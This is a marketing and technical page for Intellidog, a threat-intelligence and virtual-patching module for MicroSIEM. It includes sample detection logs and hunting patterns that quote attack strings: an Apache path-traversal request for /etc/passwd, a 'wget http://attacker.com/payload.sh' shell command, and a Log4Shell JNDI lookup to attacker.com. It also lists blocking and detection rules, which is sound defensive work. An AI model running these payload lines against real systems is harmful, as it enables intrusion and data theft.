Intellidog – Modulo Threat Intelligence per MicroSIEM

Descrizione Prodotto

Intellidog è il modulo premium di threat intelligence che trasforma MicroSIEM da sistema di monitoring reattivo a piattaforma di threat hunting proattiva. Attraverso l’integrazione con fonti di intelligence globali (MISP, Shodan, AlienVault OTX) e l’analisi comportamentale avanzata, Intellidog risponde alla domanda critica che ogni security team si pone: “Questa vulnerabilità è solo teorica o qualcuno sta già cercando di sfruttarla sui miei sistemi?”

A differenza dei tradizionali feed di threat intelligence che si limitano a fornire liste di IoC (Indicators of Compromise), Intellidog effettua correlazione contestuale multi-sorgente: confronta vulnerabilità note (da Sentinel Core) con attività reale sui sistemi (syscall, log applicativi, traffico di rete da Firedog) per determinare con confidence scoring se un exploit è attivamente utilizzato contro la vostra infrastruttura.

Quando una patch ufficiale non è disponibile o applicabile (sistemi legacy, EOL software, downtime inaccettabile), Intellidog implementa virtual patching automatizzato: genera regole IDS/IPS-like che neutralizzano gli exploit a livello di rete o applicazione, fornendo protezione immediata mentre si lavora su una soluzione definitiva.

Intellidog non è un tool standalone – è un’estensione nativa di MicroSIEM che eredita tutta l’infrastruttura di monitoring esistente, aggiungendo il layer di intelligence che rende i vostri dati operativi actionable per threat detection e response proattiva.

---

Caratteristiche Principali

🌐 Threat Intelligence Multi-Source

Fonti Integrate (Feed Gratuiti Inclusi):

1. MISP (Malware Information Sharing Platform):

• Tipo: Community-driven threat intelligence
• Coverage:
  • Malware signatures (hash MD5/SHA-256)
  • C2 server IP/domains
  • Attack patterns (MITRE ATT&CK mapping)
  • Ransomware campaigns
• Update frequency: Real-time (webhook) + scheduled sync ogni 4 ore
• Data volume: ~500k IoC attivi (deduplicated)
• Community feeds:
  • CIRCL (Luxembourg CERT)
  • Botvrij.eu (Dutch AV platform)
  • COVID-19 themed attacks
  • Ransomware trackers

Configuration:

yaml

# /opt/microsiem/intellidog/config/misp.yml
misp:
  url: https://misp-instance.org
  api_key: YOUR_API_KEY
  sync_interval: 4h
  feeds:
    - circl
    - botvrij
    - ransomware_tracker
  filters:
    tags: ["apt", "ransomware", "exploit-kit"]
    threat_level: [1, 2]  # High, Medium (skip Low/Info)

---

2. AlienVault OTX (Open Threat Exchange):

• Tipo: Crowdsourced threat intelligence
• Coverage:
  • Malicious IPs (botnet, C2, scanner)
  • Phishing domains
  • CVE-to-IoC mapping
  • Threat actor TTPs
• Update frequency: Hourly
• Data volume: ~2M IoC
• Pulses: Curated threat packages (e.g. “APT28 Campaign Q1 2024”)

API Integration:

# Automatic enrichment example
def enrich_ip(ip_address):
    otx_data = otx_api.get_indicator_details_full(ip_address)
    
    return {
        'reputation_score': otx_data.reputation,
        'malware_families': otx_data.malware_families,
        'countries': otx_data.countries,
        'pulses': [p['name'] for p in otx_data.pulses[:5]]
    }

---

3. AbuseIPDB:

• Tipo: IP reputation database
• Coverage:
  • Reported abusive IPs (user submissions)
  • Abuse categories (SSH brute force, port scan, spam, etc.)
  • Confidence score (0-100%)
  • Geolocation + ISP info
• Update frequency: Real-time queries
• API Limits: 1000 queries/day (free tier)

Use case: Validate se IP sospetto è known bad actor

4. Talos Intelligence (Cisco):

• Tipo: Vendor threat intelligence
• Coverage:
  • IP/Domain reputation
  • Email reputation (anti-spam)
  • File reputation (hash lookup)
  • Vulnerability research
• Access: Free API + threat feeds
• Specialty: Email security (spam/phishing detection)

---

Fonti Premium (Opzionali):

5. Shodan API ($59/mese o $899/anno):

• Tipo: Internet-wide scanning database
• Coverage:
  • Exposed services per IP/domain
  • Banner information (software versions)
  • Vulnerability identification
  • Historical data (quando servizio è apparso online)
  • SSL certificate info

Why Shodan per Intellidog:

• Asset exposure validation: “Il mio server RDP è esposto Internet?” → query Shodan
• Vulnerability confirmation: CVE su Apache 2.4.49 → Shodan mostra chi ha quella versione exposed
• Attack surface mapping: Discover forgotten/shadow IT assets

API Example:

import shodan

api = shodan.Shodan(‘YOUR_API_KEY’)

Check if your IP is exposed

results = api.host(‘203.0.113.50’)

print(f”Open ports: {results[‘ports’]}”)
print(f”Vulnerabilities: {results.get(‘vulns’, [])}”)
print(f”Last update: {results[‘last_update’]}”)

Output:

Open ports: [22, 80, 3306]

Vulnerabilities: [‘CVE-2021-41773’] # Apache path traversal

Last update: 2024-01-15

**ROI Shodan**: Se rilevi 1 vulnerabilità exposed critica grazie a Shodan → eviti breach → $59/mese è trascurabile vs costo incident (€50k-500k).

---

**6. VirusTotal API (Premium):**
- **Tipo**: Multi-AV file/URL/IP scanning
- **Coverage**:
  - File hash reputation (70+ AV engines)
  - URL/Domain reputation
  - IP reputation
  - Passive DNS data
  - Malware behavioral analysis
- **Pricing**: Free tier limited (4 req/min), Premium $500-10k/anno

**Use case**: Suspect file/URL → query VirusTotal → 45/70 AV detect as malicious = confirmed threat

---

**7. Recorded Future (Enterprise):**
- **Tipo**: AI-powered threat intelligence platform
- **Coverage**:
  - Predictive threat intelligence
  - Dark web monitoring
  - Threat actor profiling
  - Vulnerability risk scoring (proprietary algorithm)
- **Pricing**: €30k-150k/anno (enterprise-only)

**When needed**: Large organizations (1000+ employees) con advanced threat actors targeting them (APT groups, nation-state).

---

### **🔍 Exploit Detection Engine**

**Correlation Multi-Layer:**

Intellidog determina se vulnerabilità è sfruttata attraverso correlazione 5 livelli:

**Level 1: Vulnerability Context**

Input: CVE-2024-1234 presente su web-prod-01 (da Sentinel Core)
Data: CVSS 9.8, EPSS 45%, Exploit public (Metasploit module available)
Asset: Apache 2.4.49, port 443 exposed Internet

**Level 2: IoC Matching**

Query threat intel feeds:
├─ MISP: CVE-2024-1234 associated with exploit signature “GET /cgi-bin/.%2e/%2e%2e/”
├─ AlienVault: 23 IPs recently scanning for this vuln
└─ AbuseIPDB: 203.0.113.50 reported 47 times for “Web attack”

Cross-reference con log:
├─ Apache access.log: 203.0.113.50 – – [15/Jan/2024:10:30:15] “GET /cgi-bin/.%2e/%2e%2e/etc/passwd”
└─ ✅ MATCH: Exploit pattern detected in logs

**Level 3: Behavioral Analysis**

Syscall monitoring (via auditd/eBPF):
├─ Process: httpd (PID 1234)
├─ Syscall: execve(“/bin/sh”, [“-c”, “wget http://attacker.com/payload.sh”], …)
├─ Parent: httpd (web server spawning shell = anomalous)
└─ ⚠️ ANOMALY: Web server should never spawn shell

File system monitoring:
├─ New file: /tmp/.hidden_backdoor (suspicious location + hidden file)
├─ Permissions: 0777 (world-writable = red flag)
└─ ⚠️ ANOMALY: Unexpected file creation in /tmp

**Level 4: Network Analysis**

PCAP analysis (da Firedog):
├─ Outbound connection: web-prod-01 → 198.51.100.20:4444
├─ Protocol: Raw TCP (non-standard port)
├─ Timing: Immediatamente dopo suspicious Apache request
├─ Volume: 15 MB transferred (potential data exfiltration)
└─ ⚠️ ANOMALY: Web server initiating outbound connection to non-whitelisted IP

DNS queries (da monitoring logs):
├─ Query: c2-server-xyz123.attacker-domain.com
├─ Frequency: Every 60 seconds (beaconing pattern)
└─ ⚠️ ANOMALY: C2 communication pattern detected

**Level 5: Pattern Recognition**

Known exploit patterns (signature-based):
├─ Apache path traversal: ✅ Detected
├─ Command injection: ✅ Detected (execve syscall)
├─ Reverse shell: ✅ Detected (outbound connection to non-standard port)
└─ Data exfiltration: ✅ Suspected (volume transferred)

Attack chain reconstruction:

1. [10:30:15] Exploit attempt (path traversal)
2. [10:30:16] Command execution (wget payload)
3. [10:30:18] Backdoor installation (/tmp/.hidden_backdoor)
4. [10:30:20] C2 connection established (198.51.100.20:4444)
5. [10:30:25] Data exfiltration begins (15 MB transferred)

CONCLUSION: Exploit CONFIRMED with HIGH confidence

---

**Confidence Scoring:**

Confidence Score (0-100%) = weighted_sum([
IoC_match * 0.25, # Threat intel correlation
Behavioral_anomaly * 0.30, # Syscall/filesystem anomalies
Network_anomaly * 0.25, # C2 communication patterns
Pattern_match * 0.20 # Known exploit signatures
])

Classification:
├─ 0-30% = LOW (Anomalia ambigua, monitoring)
├─ 30-70% = MEDIUM (Sospetto, investigate)
├─ 70-90% = HIGH (Probabile exploit, remediate urgente)
└─ 90-100% = CONFIRMED (Exploit confermato, incident response)

Example Output:

{
“vulnerability”: “CVE-2024-1234”,
“asset”: “web-prod-01”,
“confidence”: 92,
“classification”: “CONFIRMED”,
“evidence”: {
“ioc_matches”: [
{
“source”: “MISP”,
“type”: “exploit_pattern”,
“value”: “GET /cgi-bin/.%2e/%2e%2e/”,
“timestamp”: “2024-01-15T10:30:15Z”
}
],
“behavioral_anomalies”: [
{
“type”: “process_spawn”,
“description”: “httpd spawned /bin/sh”,
“severity”: “high”
},
{
“type”: “file_creation”,
“path”: “/tmp/.hidden_backdoor”,
“severity”: “critical”
}
],
“network_anomalies”: [
{
“type”: “c2_communication”,
“destination”: “198.51.100.20:4444”,
“protocol”: “tcp”,
“volume_mb”: 15
}
]
},
“recommendations”: [
“Isolate asset web-prod-01 from network immediately”,
“Kill process PID 1234 and children”,
“Remove backdoor file /tmp/.hidden_backdoor”,
“Block IP 198.51.100.20 at firewall (Firedog)”,
“Apply patch for CVE-2024-1234 (Apache 2.4.50+)”,
“Investigate data exfiltrated (forensic analysis required)”
]
}

---

### **🛡️ Virtual Patching Automatizzato**

**Cos'è Virtual Patching:**

Quando patch ufficiale non disponibile/applicabile, Intellidog crea "patch virtuale" = regole che bloccano exploit senza modificare software vulnerabile.

**Use Cases Virtual Patching:**

**1. Software EOL (End-of-Life):**

Scenario: Windows Server 2008 R2 con IIS 7.5
Problem: Microsoft non rilascia più patch
Vulnerability: CVE-2023-XXXX (RCE in IIS)
Solution: Virtual patch blocca exploit pattern a livello rete

**2. Patch Non Applicabile:**

Scenario: Applicazione legacy Java 6 (vendor out-of-business)
Problem: CVE critica, no patch disponibile
Solution: Virtual patch blocca malicious input prima che raggiunga app

**3. Downtime Inaccettabile:**

Scenario: Sistema produzione 24/7 (e.g. SCADA, medical device)
Problem: Patch richiede reboot, downtime costa €50k/ora
Solution: Virtual patch protegge mentre si schedula maintenance window

**4. Patch Delayed:**

Scenario: Zero-day pubblicato, patch vendor ETA 2 settimane
Problem: Asset exposed durante window vulnerabilità
Solution: Virtual patch protegge immediately mentre si attende patch

Virtual Patching Mechanisms:

1. Network-Level Blocking (via Firedog):

Esempio: Apache path traversal CVE-2021-41773

Exploit pattern: /../ in URL path

Firedog/iptables rule

iptables -A INPUT -p tcp –dport 80 -m string –algo bm –string “/../” -j LOG –log-prefix “VPATCHED_CVE202141773: “
iptables -A INPUT -p tcp –dport 80 -m string –algo bm –string “/../” -j DROP

Alternative: Use Suricata/Snort IDS rule

alert http any any -> $HOME_NET 80 (
msg:”Virtual Patch – Apache Path Traversal CVE-2021-41773″;
flow:to_server,established;
content:”/../”; http_uri;
sid:1000001;
rev:1;
)

Pros:

• ✅ Immediate protection (applica in secondi)
• ✅ No application modification required
• ✅ Reversible (remove rule quando patch applicata)

Cons:

• ⚠️ False positives possibili (legit request con /../ in URL)
• ⚠️ Bypass possibili (encoding variations: ..%2F, ..%5C)

2. Application-Level Filtering (ModSecurity WAF):

ModSecurity rule per virtual patch

SecRule REQUEST_URI “@contains /../” \
“id:1000001,\
phase:2,\
deny,\
status:403,\
log,\
msg:’Virtual Patch – Path Traversal Attempt CVE-2021-41773′”

Advanced: Block multiple encoding variations

SecRule REQUEST_URI “@rx (?:..\/|..\|..%2[fF]|..%5[cC])” \
“id:1000002,\
phase:2,\
deny,\
status:403,\
log,\
msg:’Virtual Patch – Encoded Path Traversal'”

**Pros**:
- ✅ More granular (HTTP-aware)
- ✅ Handles encoding variations
- ✅ Better logging (HTTP context)

**Cons**:
- ⚠️ Requires ModSecurity installed
- ⚠️ Performance overhead (regex matching)

---

**3. System-Level Mitigation (AppArmor/SELinux):**

AppArmor profile per Apache

/etc/apparmor.d/usr.sbin.httpd:

include

/usr/sbin/httpd {
#include
#include

# Deny access to sensitive paths (even if path traversal succeeds)
deny /etc/passwd r,
deny /etc/shadow r,
deny /root/** rw,
deny /home/** rw,

# Allow only web root
/var/www/** r,
/var/www/html/** rw,
}

Pros:

• ✅ Defense-in-depth (anche se exploit bypassa WAF)
• ✅ Kernel-level enforcement (hard to bypass)

Cons:

• ⚠️ Requires SELinux/AppArmor enabled
• ⚠️ Complex policy creation

4. Service Modification (Feature Disable):

Esempio: Disable vulnerable PHP function

/etc/php/7.4/apache2/php.ini

disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source

Disable dangerous Apache modules

a2dismod cgi
a2dismod cgid
systemctl reload apache2

**Pros**:
- ✅ Eliminates vulnerability completely (se feature non necessaria)
- ✅ Zero performance overhead

**Cons**:
- ⚠️ May break legitimate functionality
- ⚠️ Requires application compatibility testing

---

**Virtual Patch Lifecycle:**

**Phase 1: Detection**

Intellidog detects:
├─ CVE-2024-1234 on web-prod-01
├─ No patch available (software EOL)
├─ Asset exposed Internet (high risk)
└─ Exploit PoC public (Metasploit module exists)

Decision: Virtual patching required

**Phase 2: Patch Creation**

Intellidog analyzes:
├─ CVE details (NVD, vendor advisory)
├─ Exploit PoC code (identify attack pattern)
├─ Asset configuration (Apache, ModSecurity available?)
└─ Generate virtual patch rules

Options:
[1] Network-level block (iptables) – IMMEDIATE
[2] WAF rule (ModSecurity) – RECOMMENDED
[3] AppArmor profile – DEFENSE-IN-DEPTH

**Phase 3: Testing (Critical!)**

Deploy virtual patch in ALERT-ONLY mode:
├─ Rules log but don’t block (24-48 hours)
├─ Monitor false positives
├─ Verify legitimate traffic unaffected
└─ Tune rules if necessary

Metrics:
├─ Exploit attempts blocked: 47
├─ False positives: 2 (legit CDN request with encoded URL)
├─ Action: Whitelist CDN IP range

**Phase 4: Activation**

After testing successful:
├─ Switch from ALERT to BLOCK mode
├─ Notify SOC team: “Virtual patch active on web-prod-01”
├─ Schedule re-scan (verify exploit blocked)
└─ Document in change management

**Phase 5: Monitoring**

Continuous validation:
├─ Count exploit attempts blocked (daily)
├─ Monitor false positive rate (<1% acceptable)
├─ Alert if bypass detected (new exploit variant)
└─ Weekly review: Is official patch now available?

**Phase 6: Decommissioning**

When official patch available:
├─ Apply vendor patch (maintenance window)
├─ Verify vulnerability resolved (re-scan)
├─ Remove virtual patch rules (cleanup)
└─ Document: “CVE-2024-1234 patched, virtual patch retired”

---

**Virtual Patch Success Metrics:**

Virtual Patch Report – CVE-2024-1234
═══════════════════════════════════════

Deployment Date: 2024-01-15
Decommission Date: 2024-01-29 (14 days active)

Protection Stats:
├─ Exploit attempts blocked: 1,247
├─ Unique attacker IPs: 89
├─ False positives: 3 (0.24%)
├─ Bypass attempts: 0
└─ Downtime during virtual patch: 0 minutes

Business Impact:
├─ Asset protected: web-prod-01 (revenue-critical)
├─ Estimated breach cost avoided: €250k
├─ Downtime avoided: 0 hours (vs 4 hours for emergency patching)
└─ ROI: 25000% (patch cost €1k, breach cost avoided €250k)

Recommendation: Virtual patching strategy validated ✅

🎯 Threat Hunting Proattivo

Sigma Rules Library:

Intellidog include 500+ detection rules formato Sigma (vendor-agnostic detection format).

Sigma Rule Example:

title: Suspicious PowerShell Execution
id: 91afbe0e-8cc7-4a9a-9e7c-91afbe0e8cc7
status: stable
description: Detects suspicious PowerShell command patterns
references:
– https://attack.mitre.org/techniques/T1059/001/
author: Intellidog Team
date: 2024/01/15
tags:
– attack.execution
– attack.t1059.001
logsource:
product: linux
service: auditd
detection:
selection:
type: ‘EXECVE’
a0|contains: ‘powershell’
a1|contains:
– ‘-enc’ # Encoded command
– ‘-NoProfile’
– ‘-WindowStyle Hidden’
– ‘Invoke-Expression’
– ‘IEX’
– ‘DownloadString’
condition: selection
falsepositives:
– Legitimate PowerShell scripts
level: high

**Rule Categories:**
- **Persistence** (T1547): Startup scripts, cron jobs anomali
- **Privilege Escalation** (T1068): Kernel exploits, SUID abuse
- **Defense Evasion** (T1070): Log clearing, timestomping
- **Credential Access** (T1003): Credential dumping, keylogging
- **Discovery** (T1087): Network scanning, user enumeration
- **Lateral Movement** (T1021): SSH/RDP lateral movement
- **Collection** (T1005): Data staged for exfiltration
- **Exfiltration** (T1041): Data transfer to external hosts

---

**Custom Query Builder:**

**UI-based query creation:**

Query: Find all SSH login attempts from IPs with AbuseIPDB score > 80

[Field: log_type] [Operator: equals] [Value: auth]
AND
[Field: event] [Operator: contains] [Value: ssh login]
AND
[Field: source_ip] [Operator: reputation_score_gt] [Value: 80] [Source: AbuseIPDB]

Time range: Last 30 days
Group by: source_ip
Order by: count DESC

**Query Result:**

╔═══════════════╦═══════╦══════════════╦══════════════╗
║ Source IP ║ Count ║ AbuseIPDB ║ Countries ║
╠═══════════════╬═══════╬══════════════╬══════════════╣
║ 203.0.113.50 ║ 1,247 ║ 95 (CRITICAL)║ CN ║
║ 198.51.100.20 ║ 892 ║ 87 (HIGH) ║ RU ║
║ 192.0.2.100 ║ 456 ║ 82 (HIGH) ║ BR ║
╚═══════════════╩═══════╩══════════════╩══════════════╝

Recommendation: Block these IPs immediately (Firedog integration)

Search for IoC in 90-day log retention

intellidog-hunt –ioc 203.0.113.50 –lookback 90d

Results:

Found 47 occurrences of 203.0.113.50 in historical logs:

[2024-01-15 10:30] SSH brute force attempt (failed)
[2024-01-14 22:15] Port scan detected (22, 80, 443, 3306)
[2024-01-10 03:45] Apache exploit attempt (CVE-2021-41773)
…
[2023-11-20 18:20] First seen (DNS query to C2 domain)

CONCLUSION: IP active for 3 months, persistent threat actor
RECOMMENDATION: Permanent ban + report to ISP abuse team

**Use case**: New IoC published today → search historical logs → discover you were compromised 3 months ago (senza saperlo).

---

**Hunting Campaigns:**

**Campaign: Log4Shell Zero-Day Hunt**

Scenario: Log4j CVE-2021-44228 (Log4Shell) announced 2021-12-10
Action: Proactive hunt even if no vulnerability scanner ran yet

Hunting queries:

1. Search for JNDI lookup patterns in HTTP logs

• Pattern: ${jndi:ldap://attacker.com/exploit}

1. Search for Java processes spawning shells

• auditd: EXECVE from java parent process

1. Search for outbound LDAP connections (unusual)

• netstat logs: connections to port 389/636 external

1. Search for known exploit payloads

• IoC feed: Log4Shell payload signatures

Results:
├─ 3 servers with Log4j vulnerable version detected
├─ 2 servers with exploit attempts in logs (BLOCKED by WAF)
├─ 0 servers compromised (confirmed via forensics)
└─ Action: Emergency patching completed in 4 hours

**Timeline Saved**:
- Without Intellidog: Discover vulnerability on next weekly scan (7 days delay)
- With Intellidog: Proactive hunt discovered same day (0 days delay)
- **Impact**: Prevented potential breach during 7-day window

---

### **📊 Reporting & Visualization**

**Threat Intelligence Dashboard:**

╔═══════════════════════════════════════════════════════════╗
║ Intellidog Threat Intelligence ║
║ Last 24 Hours ║
╠═══════════════════════════════════════════════════════════╣
║ ║
║ IoC Matches: 247 ║
║ ├─ MISP: 123 ║
║ ├─ AlienVault OTX: 89 ║
║ ├─ AbuseIPDB: 35 ║
║ └─ Shodan: 15 (asset exposure alerts) ║
║ ║
║ Exploit Detection: ║
║ ├─ Confirmed: 3 🔴 ║
║ ├─ High Confidence: 12 🟠 ║
║ ├─ Medium: 45 🟡 ║
║ └─ Low: 187 🟢 ║
║ ║
║ Virtual Patches Active: 5 ║
║ ├─ CVE-2024-1234 (Apache) – 47 exploits blocked ║
║ ├─ CVE-2023-5678 (OpenSSL) – 12 exploits blocked ║
║ └─ […] ║
║ ║
║ Top Threat Actors: ║
║ 1. 203.0.113.50 (CN) – 1,247 attempts ║
║ 2. 198.51.100.20 (RU) – 892 attempts ║
║ 3. 192.0.2.100 (BR) – 456 attempts ║
║ ║
╚═══════════════════════════════════════════════════════════╝

Exploit Confirmation Report

Date: 2024-01-15 10:35
Asset: web-prod-01 (192.168.1.50)
Vulnerability: CVE-2024-1234 (Apache Path Traversal)
Confidence: 92% (CONFIRMED)

Timeline

• 10:30:15 – Exploit attempt detected in Apache access.log
• 10:30:16 – Command execution confirmed (auditd syscall)
• 10:30:18 – Backdoor file created /tmp/.hidden_backdoor
• 10:30:20 – C2 connection established to 198.51.100.20:4444
• 10:30:25 – Data exfiltration begins (15 MB transferred)
• 10:35:00 – Incident detected by Intellidog

Evidence

IoC Matches

• MISP: Exploit pattern GET /cgi-bin/.%2e/%2e%2e/ (Confidence: 95%)
• AlienVault: IP 203.0.113.50 in pulse “Apache CVE-2024-1234 Exploit Campaign”
• AbuseIPDB: IP 203.0.113.50 reported 47 times (Web attack)

Behavioral Anomalies

• Process: httpd (PID 1234) spawned /bin/sh (CRITICAL)
• File: Created /tmp/.hidden_backdoor with 0777 permissions (CRITICAL)
• Network: Outbound connection to 198.51.100.20:4444 (CRITICAL)

Network Analysis

• Protocol: Raw TCP (non-HTTP)
• Volume: 15 MB outbound (potential data exfiltration)
• Duration: 5 minutes continuous connection

Recommended Actions

1. ✅ IMMEDIATE: Isolate web-prod-01 from network
2. ✅ URGENT: Kill process PID 1234 and children
3. ✅ URGENT: Remove /tmp/.hidden_backdoor
4. ✅ URGENT: Block IP 203.0.113.50 at firewall (Firedog)
5. ⏳ 24h: Apply Apache patch (version 2.4.50+)
6. ⏳ 48h: Forensic analysis of exfiltrated data
7. ⏳ 7d: Full system reinstall (compromised system)

Status

• [x] Incident response team notified (10:36)
• [x] Asset isolated (10:37)
• [x] Malicious process terminated (10:38)
• [x] IP blocked (10:39)
• [ ] Patch applied (scheduled 2024-01-16 02:00)
• [ ] Forensic analysis (in progress)

Report generated by: Intellidog v2.1.0
Analyst: auto-generated (reviewed by: admin@company.com)

---

**Weekly Threat Intelligence Digest:**

═══════════════════════════════════════════════════════════
Intellidog Weekly Digest – 2024-01-15 to 2024-01-22
═══════════════════════════════════════════════════════════

📊 SUMMARY
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Total IoC Matches: 1,847
Exploit Detections: 15 (3 confirmed, 12 high-confidence)
Virtual Patches Deployed: 2 new
Threat Hunting Campaigns: 1 completed
Assets Protected: 50

🔴 CRITICAL FINDINGS
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

1. CVE-2024-1234 Exploitation Confirmed
   ├─ Asset: web-prod-01
   ├─ Action Taken: Isolated + Patched
   ├─ Attacker: 203.0.113.50 (CN)
   └─ Status: RESOLVED ✅
2. Persistent SSH Brute Force Campaign
   ├─ Assets: db-prod-01, db-prod-02
   ├─ Attacker: 198.51.100.20 (RU)
   ├─ Attempts: 8,923 (all blocked)
   └─ Action: IP banned + SSH port changed

🟡 NOTABLE TRENDS
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

• Attack volume +35% vs previous week
• Top targeted service: SSH (45% of attacks)
• Geographic origin: CN 40%, RU 30%, US 15%, Other 15%
• New threat actor: 192.0.2.100 (first seen 2024-01-18)

🛡️ VIRTUAL PATCHING
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Active Virtual Patches: 5
├─ CVE-2024-1234 (Apache): 47 exploits blocked
├─ CVE-2023-5678 (OpenSSL): 12 exploits blocked
└─ Pending Removal: 1 (official patch applied)

💡 RECOMMENDATIONS
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

1. Consider geo-blocking CN/RU (80% attack origin)
2. Implement MFA for SSH (brute force high)
3. Review 192.0.2.100 activity (new persistent actor)
4. Schedule patching for CVE-2024-5555 (new critical)

📧 Contacts
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Questions? Contact: security-team@company.com
Unsubscribe: intellidog-settings@company.com

Powered by Intellidog v2.1.0 | MicroSIEM Suite

Casi d’Uso

Caso 1: Zero-Day Response – Log4Shell

**Scenario:**
9 Dicembre 2021, 22:00 – Ricercatore security pubblica PoC per Log4j RCE (CVE-2021-44228). Exploit massivo inizia entro ore. Azienda ha 30+ server Java in produzione, non sa quali usano Log4j.

**Without Intellidog:**

Timeline:
├─ Day 0 (09/12): Zero-day announced
├─ Day 1 (10/12): Security team reads news, starts manual check
├─ Day 2-3: Identify which servers use Log4j (slow process)
├─ Day 4: Vulnerability scanner updated with Log4Shell detection
├─ Day 5: Scan completed, 12 servers vulnerable identified
├─ Day 6-7: Emergency patching (some servers require app changes)
└─ Result: 7 days exposure window, 2 servers compromised (discovered later)

**With Intellidog:**

Timeline:
├─ Day 0 (09/12) 22:30: Zero-day announced
├─ Day 0 (09/12) 23:00: MISP feed updates with Log4Shell IoC
├─ Day 0 (09/12) 23:05: Intellidog auto-sync receives IoC
├─ Day 0 (09/12) 23:10: Intellidog launches proactive hunt:
│ ├─ Search HTTP logs for JNDI patterns: ${jndi:ldap://
│ ├─ Search auditd for java spawning shells
│ └─ Query Shodan: “Which of our IPs expose Java services?”
├─ Day 0 (09/12) 23:30: Hunt complete:
│ ├─ 12 servers identified with Log4j
│ ├─ 3 servers with exploit attempts (WAF blocked)
│ ├─ 0 servers compromised (confirmed)
├─ Day 0 (09/12) 23:45: Virtual patching deployed (all 12 servers):
│ └─ WAF rule blocks ${jndi: patterns
├─ Day 1 (10/12): Emergency patching begins (protected by virtual patch)
└─ Result: 0 days unprotected, 0 compromises

**Impact:**
- **Time to protection**: 7 days → 45 minutes (99.5% reduction)
- **Compromise**: 2 servers → 0 servers
- **Business impact**: Potential €500k breach → €0 (prevented)

---

Caso 2: APT Detection – Persistent Threat Actor

**Scenario:**
E-commerce company, 200 employees. Intellidog alert: “Suspicious outbound traffic pattern detected.” Investigation reveals APT campaign.

**Detection Timeline:**

**Week 1 – Initial Compromise (Missed by Traditional Tools):**

Attacker: Spear-phishing email to Finance dept
├─ Victim opens malicious Excel (macro enabled)
├─ Macro downloads payload from legitimate-looking domain
└─ Traditional AV: ❌ No detection (fileless payload, zero-day)

Intellidog detection:
├─ ✅ Outbound connection to suspicious domain (not in whitelist)
├─ ✅ Domain recently registered (Whois check)
├─ ✅ TLS certificate anomaly (self-signed)
└─ Alert: “Suspicious outbound connection from FINANCE-PC-01”

**Week 2 - Lateral Movement:**

Attacker: Enumerate network, move laterally
├─ Port scan internal network from FINANCE-PC-01
├─ Attempt privilege escalation (Mimikatz)
└─ Access file server (credentials stolen)

Intellidog detection:
├─ ✅ Port scan detected (unusual activity from workstation)
├─ ✅ Process anomaly: lsass.exe memory read (credential dumping)
├─ ✅ File server access from unusual IP (not typical user pattern)
└─ Alert: “Potential lateral movement detected”

**Week 3 - Data Exfiltration:**

Attacker: Stage data, exfiltrate to C2
├─ Compress customer database (25GB)
├─ Split into chunks, encrypt
└─ Upload to attacker-controlled cloud storage

Intellidog detection:
├─ ✅ Unusual file compression activity (7z.exe, large volume)
├─ ✅ Outbound traffic spike (25GB over 2 hours – anomalous)
├─ ✅ Destination: Cloud storage IP (known C2 infrastructure per MISP)
└─ Alert: “CRITICAL – Potential data exfiltration”

**Incident Response:**

With Intellidog evidence:
├─ Timeline reconstruction: 3 weeks compromise (complete picture)
├─ Scope identification: 5 hosts compromised, 1 data exfiltration
├─ IoC extraction: C2 domains, attacker IPs, malware hashes
├─ Network isolation: Compromised hosts quarantined
├─ Forensic analysis: 25GB customer data exfiltrated (confirmed)
└─ Recovery: Systems reimaged, passwords reset, customers notified

Cost impact:
├─ Without Intellidog: Breach discovered months later (audit), massive fine
├─ With Intellidog: Early detection (week 3), contained quickly
├─ GDPR fine avoided: ~€500k (timely breach notification)
└─ Reputation damage: Minimal (proactive customer communication)

---

### **Caso 3: Legacy System Protection - Medical Device**

**Scenario:**  
Hospital with CT scanner (medical device) running Windows XP Embedded (EOL 2016). Device manufacturer out-of-business, no updates available. Device must remain operational (patient safety), but has critical vulnerabilities.

**Challenge:**

Device specs:
├─ OS: Windows XP Embedded (EOL)
├─ Software: Proprietary CT imaging software v3.2 (last update 2015)
├─ Network: Connected to hospital network (PACS integration)
├─ Vulnerabilities: 247 known CVEs (per vulnerability scan)
│ ├─ 23 Critical (RCE, privilege escalation)
│ ├─ 89 High
│ └─ 135 Medium/Low
└─ Patch availability: NONE (vendor defunct, OS EOL)

Compliance requirement:
├─ HIPAA: Device processes PHI (must be protected)
├─ FDA: Medical device (cannot modify software without recertification)
└─ Hospital policy: 99.9% uptime required (patient safety)

Virtual patch for SMBv1 vulnerabilities (EternalBlue, etc.)

Block SMB traffic to/from CT scanner

sudo iptables -A FORWARD -s 10.10.10.5 -p tcp –dport 445 -j DROP
sudo iptables -A FORWARD -d 10.10.10.5 -p tcp –dport 445 -j DROP

Virtual patch for RDP vulnerabilities

Block RDP except from admin workstation

sudo iptables -A FORWARD -d 10.10.10.5 -p tcp –dport 3389 \
! -s 10.30.1.100 -j DROP # Admin workstation only

**Layer 3: Behavioral Monitoring (Intellidog)**

Monitor for anomalies:
├─ Process monitoring: Alert if unknown process starts
├─ Network monitoring: Alert if connection to non-whitelisted IP
├─ File monitoring: Alert if system file modified
└─ User monitoring: Alert if non-authorized user login

**Layer 4: Compensating Controls**

Additional measures:
├─ EDR agent (minimal footprint): CrowdStrike Falcon (read-only mode)
├─ USB disabled: Prevent malware via USB stick
├─ Dedicated admin workstation: Jump box for device access
└─ Regular backups: Weekly image backup (30-min restore time)

**Result:**

Protection status:
├─ Network attack surface: 247 CVEs → 3 reachable (98.8% reduction)
├─ Remaining risk: Physical access attacks only (mitigated by physical security)
├─ Uptime: 99.95% (4.4 hours downtime/year, within SLA)
├─ Compliance: HIPAA audit passed (compensating controls documented)
└─ Incidents: 0 in 2 years operation

Alternative (without Intellidog):
├─ Option 1: Keep device as-is → High breach risk, compliance failure
├─ Option 2: Replace device → €500k cost (new CT scanner)
├─ Option 3: Air-gap device → Lose PACS integration, workflow disruption
